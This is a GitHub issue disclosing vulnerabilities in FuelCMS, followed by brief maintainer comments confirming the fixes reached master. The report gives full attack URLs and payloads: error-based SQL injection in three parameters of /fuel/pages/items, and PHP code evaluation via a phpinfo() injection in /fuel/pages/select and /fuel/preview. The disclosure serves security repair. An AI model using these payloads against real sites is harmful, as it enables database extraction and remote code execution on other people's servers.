New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Vulnerability - Code Evaluations & SQL Injections #478
Comments
|
Great finds @om3rcitak! Shouldn't there be a new bug fix version of FuelCMS after discoveries like this though, @daylightstudio? It feels that code is kept in |
|
@martynassateika you are right. There are essentially 2 develop branches going right now that I'd like to merge (develop and feature/php_7.2_compatibility). We currently have a lot of sites on 7.1 still and so the 7.2 vetting has been a little slower but is probably ready. |
|
@daylightstudio |
|
These updates have been applied to the master branch already. |
Thanks for confirming! |
Vulnerability - Code Evaluations & SQL Injections
Environment
Vulnerability Tree
1.1. /fuel/pages/items (GET = search_term)
1.2. /fuel/pages/items (GET = layout)
1.3. /fuel/pages/items (GET = published)
2.1. /fuel/pages/select/ (GET = filter)
2.2. /fuel/preview (POST = data)
1.1. SQL Injection in /fuel/pages/items (GET = search_term)
URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&layout=&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=yes&limit=50
Parameter Name: search_term
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT()%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
1.2. SQL Injection in /fuel/pages/items (GET = layout)
URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=&layout=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=yes&limit=50
Parameter Name: layout
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT()%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
1.3. SQL Injection in /fuel/pages/items (GET = published)
URL: http://{domain}/{fuelcms_path}/fuel/pages/items?search_term=&layout=&search=Search&view_type=list&offset=3&order=asc&col=location&fuel_inline=3&published=-1%22%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%22&limit=50
Parameter Name: published
Parameter Type: GET
Attack Pattern: -1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT()%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22
2.1. Code Evaluation in /fuel/pages/select/ (GET = filter)
URL: http://{domain}/{fuelcms_path}/fuel/pages/select/?nocache=1507880376191&input=&target=&title=&class=&pdfs=&filter=%27%2b phpinfo() %2b%27
Parameter Name: filter
Parameter Type: GET
Attack Pattern: %27%2b phpinfo() %2b%27
2.2. Code Evaluation in /fuel/preview (POST = data)
URL: http://{domain}/{fuelcms_path}/fuel/preview?module=pages&field=vars--body
Parameter Name: data
Parameter Type: POST
Attack Pattern: %27%2b phpinfo() %2b%27
The text was updated successfully, but these errors were encountered: